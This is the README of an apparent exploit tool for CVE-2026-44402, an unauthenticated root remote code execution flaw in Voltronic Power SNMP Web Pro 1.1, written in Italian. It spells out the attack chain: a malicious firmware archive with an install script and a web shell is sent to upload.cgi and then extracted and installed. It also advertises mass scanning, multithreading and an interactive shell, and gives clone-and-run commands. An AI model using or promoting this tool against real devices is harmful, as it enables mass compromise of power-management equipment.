
Exploit per CVE-2026-44402 che colpisce Voltronic Power SNMP Web Pro 1.1, consentendo l'esecuzione remota di codice non autenticata tramite upload di firmware dannoso. Supporta scansione su singolo target e di massa con shell interattiva.
Esecuzione Remota di Codice Critica non autenticata (CVSS 9.8) — Voltronic Power SNMP Web Pro 1.1
Questo strumento sfrutta CVE-2026-44402, una vulnerabilità nel dispositivo Voltronic Power SNMP Web Pro 1.1 che consente a attaccanti non autenticati di caricare un archivio firmware dannoso ed eseguire comandi di sistema come root tramite l'endpoint upload.cgi.
| Proprietà | Valore |
|---|
| ID CVE | CVE-2026-44402 |
| Punteggio CVSS | 9.8 (Critico) |
| CWE | CWE-434 — Upload illimitato di file con tipo pericoloso |
| Prodotto interessato | Voltronic Power SNMP Web Pro 1.1 |
| Autenticazione richiesta | NO (non autenticata) |
| Vettore di attacco | Basato sulla rete (remoto) |
| Privilegio | RCE a livello root |
La vulnerabilità risiede nella funzionalità di aggiornamento firmware (upload.cgi). L'endpoint:
Creare un Archivio Dannoso
upgrade/install.sh — script di installazioneupgrade/pwned.cgi — web shellCaricare l'Archivio → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK" se riuscitoEstrarre l'Archivio → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK" se riuscitoInstallare → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh viene eseguito come root"ACK" se riuscitoWeb Shell Attiva → POST /cgi-bin/pwned.cgi
cmd → RCE! 🚀-u)-f targets.txt)-t 20) — elaborazione parallela veloce--shell) con supporto cdurl | output--proxy)--timeout)-v) per il debugrequests e prompt_toolkit# Clona il repository
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py